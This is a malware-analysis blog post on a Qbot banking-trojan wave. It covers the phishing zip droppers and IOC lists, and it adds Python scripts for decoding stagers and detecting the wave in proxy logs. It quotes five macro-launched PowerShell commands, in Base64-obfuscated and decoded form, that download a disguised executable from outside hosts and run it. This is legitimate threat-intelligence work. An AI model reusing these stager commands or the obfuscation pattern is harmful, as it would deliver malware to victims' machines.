Since last month there has been a significant resurgence in Qbot. Several Qbot waves have been reported, such as the “feature”, “extend”, “string” and “one-drive” waves, and bot groups spx85 to spx103 were found active during this Qakbot resurgence. In this post we go through a detailed analysis of one Qbot wave, the “feature” wave from bot group spx98.
What is Qbot?
Qbot is Malwarebytes’ detection name for a large family of backdoor trojans that has been around in one form or another since 2009. Qbot is mainly a banking Trojan and password stealer. It is worth noting that most variants are sandbox/VM aware and some are polymorphic. Exploit kits used to be Qbot’s main delivery vector, but it now relies on email links and attachments on a large scale.
Analysis of this new wave – chain of events
1. Delivery Method – Email attachment / Link
2. Dropping Initial payload – zip file
When the user clicks the “ATTACHMENT_DOWNLOAD” link, the zip file is fetched from the URL embedded in the email. Some of the zip download links observed in these emails were:
- hxxp://braincricket[.]com/feature/10510/10510.zip – VT Analysis
- hxxp://bouyonclip[.]com/feature/66981937/66981937.zip – VT analysis
- hxxp://bread[.]karenkee[.]com/feature/9494249/9494249.zip – VT analysis
- hxxp://careon[.]io/feature/553382.zip – VT analysis
- hxxp://cloudtunez[.]com/feature/0160397.zip – VT analysis
3. Extracting the maldoc and enabling macros
Upon opening the Word document and clicking “Enable Editing”, the macro runs and silently executes PowerShell, which tries six URLs in turn (five are reproduced below) to fetch the Qbot payload, a PE file served under a .png name.
4. PowerShell commands found embedded in the maldoc (encoded as launched by the macro, followed by the decoded equivalent)
Encoded and decoded command 1:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
cmd /C powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://automatischer-staubsauger[.]com/feature/777777[.]png', 'C:\Users\Public\tmpdir\file1.exe')" >C:\Users\Public\1.txt
Encoded and decoded command 2:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2RlbW8uY2FnbGlmaWNpb2NsZXJpY2kuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')
powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://demo.caglificioclerici[.]com/feature/777777[.]png', 'C:\Users\Public\tmpdir\file2.exe')"
Encoded and decoded command 3:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2FuYW1pa2FpbmRhbmVnYXMuaW4vZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '3' + '.e' + 'x' + 'e')
powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://anamikaindanegas[.]in/feature/777777[.]png', 'C:\Users\Public\tmpdir\file3.exe')"
Encoded and decoded command 4:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2RhaW9ocy5jb20udHcvZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '4' + '.e' + 'x' + 'e')
powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://daiohs.com[.]tw/feature/777777[.]png', 'C:\Users\Public\tmpdir\file4.exe')"
Encoded and decoded command 5:
powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzM2MGRpZ2l0YWxjbGljay5jb20vZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '5' + '.e' + 'x' + 'e')
powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://360digitalclick[.]com/feature/777777[.]png', 'C:\Users\Public\tmpdir\file5.exe')"
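The decoding above was done by hand. The following script is an added example (my own triage helper, not code from the original post or from the Qbot macro) that recovers the same two facts from each command automatically: the payload URL and the file name the stager writes, which is the Base64 prefix plus the concatenated string fragments ('1' + '.e' + 'x' + 'e'). The two sample commands are copied verbatim from the post; the defanging style (hxxp, [.]) mirrors the post's, and the extension-mismatch flag (a .png fetched but an .exe written) is my own addition.

```python
import base64
import re

# Constructed samples: two of the macro-launched stagers quoted in the post, copied
# verbatim. Each carries two Base64 blobs (payload URL, drop-path prefix) and builds
# the file-name suffix from concatenated one- or two-character string fragments.
SAMPLE_COMMANDS = [
    r'''cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt''',
    r'''powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzM2MGRpZ2l0YWxjbGljay5jb20vZmVhdHVyZS83Nzc3NzcucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '5' + '.e' + 'x' + 'e')''',
]

B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
FRAG_RE = re.compile(r"\+\s*'([^']*)'")   # the '1' + '.e' + 'x' + 'e' pieces


def defang(url):
    """Neutralise a URL the way the post does (hxxp, [.]) so it can be shared safely."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def decode_stager(cmd):
    """Recover the payload URL and drop path from one obfuscated DownloadFile command."""
    blobs = B64_RE.findall(cmd)
    if len(blobs) != 2:
        raise ValueError(f"expected 2 Base64 blobs (URL, path prefix), found {len(blobs)}")
    url = base64.b64decode(blobs[0]).decode("ascii")
    path_prefix = base64.b64decode(blobs[1]).decode("ascii")
    suffix = "".join(FRAG_RE.findall(cmd))      # '1' + '.e' + 'x' + 'e' -> '1.exe'
    drop_path = path_prefix + suffix
    url_ext = url.rsplit(".", 1)[-1].lower()
    drop_ext = drop_path.rsplit(".", 1)[-1].lower()
    return {
        "url": url,
        "defanged_url": defang(url),
        "drop_path": drop_path,
        # served as .png, written as .exe: the "image" is really a PE (my own flag)
        "extension_mismatch": url_ext != drop_ext,
    }


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        r = decode_stager(cmd)
        print(f"{r['defanged_url']} -> {r['drop_path']} (disguised: {r['extension_mismatch']})")
```

Run against a VBA dump of a maldoc, this turns each stager line into a download URL and a host-side drop path you can pivot on (proxy logs for the former, EDR file-create events under C:\Users\Public\tmpdir for the latter).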
5. Qbot Payload
All Qbot payload links observed in the PowerShell commands served different files under the same name, 777777.png (a PE file disguised as an image). The file downloaded from the links below is written to c:\users\public\tmpdir\fileX.exe (where X is the digit, 1 to 5, appended in the decoded command) and is then executed.
- hxxp://demo.caglificioclerici[.]com/feature/777777[.]png
- hxxp://daiohs.com[.]tw/feature/777777[.]png
- hxxp://anamikaindanegas[.]in/feature/777777[.]png
- hxxp://360digitalclick[.]com/feature/777777[.]png
- hxxp://automatischer-staubsauger[.]com/feature/777777[.]png


Brief Qbot PE analysis summary can be seen in below snapshot with process tree and associated shell commands observed during its analysis.

For complete detailed analysis of the Qbot PE sample please visit the following links:
- VenusEYE Sandbox report
- Cuckoo Sandbox report
- OSINT of this sample – VT analysis
Threat Intel – IOCs
Common pattern and behavior among all waves detected in April 2020
- Email with Attachment or link.
- The link drops a .zip file named with a random 4-9 digit number, for example 10510.zip or 82386.zip.
- Most of the zip files contain a document named in one of several formats:
- Format one: Judgment_X.doc
- Format two: Judgment_X_X.doc
- Format three: NUM_X.vbs
- All Qbot payloads observed were disguised as image files (.png), for example 4444.png, 777777.png or 999999.png.
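Those naming patterns are loose enough to be written as detection logic. The script below is an added example (mine, not from the post) that scans a proxy log for the zip-stage and png-payload URL shapes listed above and checks document names against the three maldoc formats. Assumptions not in the post: the X placeholders are treated as digit runs, the log format (client, method, URL per line) is a constructed one, and the first path directory is reported as the wave name because that is how the “feature” wave URLs are laid out.

```python
import re
from collections import namedtuple
from urllib.parse import urlparse

# Patterns from the "common pattern" list. Assumptions (not from the post): the X
# placeholders in the document names are digit runs, and the first path directory
# is the wave name ("feature" in this wave).
ZIP_STAGE_RE = re.compile(r"^/(?:(?P<wave>[^/]+)/)?(?:[^/]+/)*(\d{4,9})\.zip$")
PNG_PAYLOAD_RE = re.compile(r"^/(?:(?P<wave>[^/]+)/)?(?:[^/]+/)*(\d)\2{3,}\.png$")
MALDOC_RE = re.compile(r"^(?:Judgment_\d+(?:_\d+)?\.doc|\d+_\d+\.vbs)$", re.IGNORECASE)

# Constructed proxy log: two real wave URLs from the post, two benign look-alikes,
# and two more constructed hits ("client method url" per line).
SAMPLE_PROXY_LOG = """\
10.0.0.12 GET http://braincricket.com/feature/10510/10510.zip
10.0.0.12 GET http://automatischer-staubsauger.com/feature/777777.png
10.0.0.33 GET http://example.org/assets/logo.png
10.0.0.33 GET http://example.org/downloads/release-2020.zip
10.0.0.40 GET http://cloudtunez.com/feature/0160397.zip
10.0.0.40 GET http://example.net/feature/4444.png
"""

Hit = namedtuple("Hit", "client url tag wave")


def classify_path(path):
    """Map a URL path to a Qbot stage tag and the wave directory it sits under."""
    m = ZIP_STAGE_RE.match(path)
    if m:
        return "qbot_zip_stage", m.group("wave")
    m = PNG_PAYLOAD_RE.match(path)          # one digit repeated 4+ times, e.g. 777777.png
    if m:
        return "qbot_png_payload", m.group("wave")
    return None, None


def is_maldoc_name(name):
    """True for Judgment_X.doc, Judgment_X_X.doc and NUM_X.vbs style names."""
    return bool(MALDOC_RE.match(name))


def scan_proxy_log(text):
    """Return one Hit per log line whose URL matches a wave stage pattern."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, _method, url = line.split()
        tag, wave = classify_path(urlparse(url).path)
        if tag:
            hits.append(Hit(client, url, tag, wave))
    return hits


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{h.client} {h.tag:17} wave={h.wave} {h.url}")
```

A client that first pulls a 4-9 digit .zip and then a repeated-digit .png from a /feature/ path within minutes is the full stage-1 to stage-2 chain described in this post; the wave name in each hit lets you group alerts by spx bot group when the directory changes in the next wave.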
A large number of IOCs were observed across this month; I have compiled them from different sources into one place for you all. These IOCs include zip files, URLs, hashes and Qbot PE (png) files.
- One- drive wave IOCs – 8th April 2020 – https://pastebin.com/raw/SiR5HVTD
- “extend” wave IOCs – 9th April 2020 – https://pastebin.com/raw/MejFGSW6
- Mal Docs and Qbot PE sample hashes – 15th April 2020 – https://pastebin.com/raw/319K9r7t
- “string” wave IOCs – 14th April 2020 – https://pastebin.com/raw/W671SZYc
- “feature” wave from spx_98 IOCs – 16th April 2020 – https://pastebin.com/raw/q2UFXUi3
- Qbot IPs – 16th April 2020 – https://pastebin.com/raw/QhADdVnZ
- “diiffer” wave from bot_group spx_99 IOCs – 17th April 2020 – https://pastebin.com/raw/ji1NBpFz
- Qbot IPs – 17th April 2020 – https://pastebin.com/raw/NueGcP8G
- “vary” wave from bot_group spx_100 IOCs – 20th April 2020 – https://pastebin.com/raw/qSYjLhPq
- “evolving” wave from spx_101 IOCs -21st April 2020 – https://pastebin.com/raw/3CnJw1Ui
- spx_101 IP IOCs 21st April 2020 – https://pastebin.com/raw/LnrpaeCZ
- “mapro/pump” wave from spx_102 IOCs 22nd April 2020 – https://pastebin.com/raw/sRfDp5m2
- spx_102 IP IOCs 22nd April 2020 – https://pastebin.com/L0g5fRgv
- “docs_3 character” wave from spx_103 – 23rd April 2020 – https://pastebin.com/raw/bWU9PTbv
- spx_103 bot group IP IOCs- 23rd April 2020 – https://pastebin.com/raw/7bYzetJF
- “doc_3characters” characters belonging to [a-zA-Z0-9] from spx_104 – 24th April 2020 – https://urlhaus.abuse.ch/browse/tag/spx104
- spx_105 similar to spx_104 wave pattern – https://urlhaus.abuse.ch/browse/tag/spx105
- URLhaus repository: https://urlhaus.abuse.ch/browse/tag/qbot/
The “evolving” wave is the latest one, targeting both individuals and corporates. Stay tuned for more upcoming IOCs.
#Qbot #malware #april #spx_bot #waves #extend_wave #string_wave #feature_wave #differ_wave #vary_wave #evolving_wave
Stay tuned for more cyber stuff!!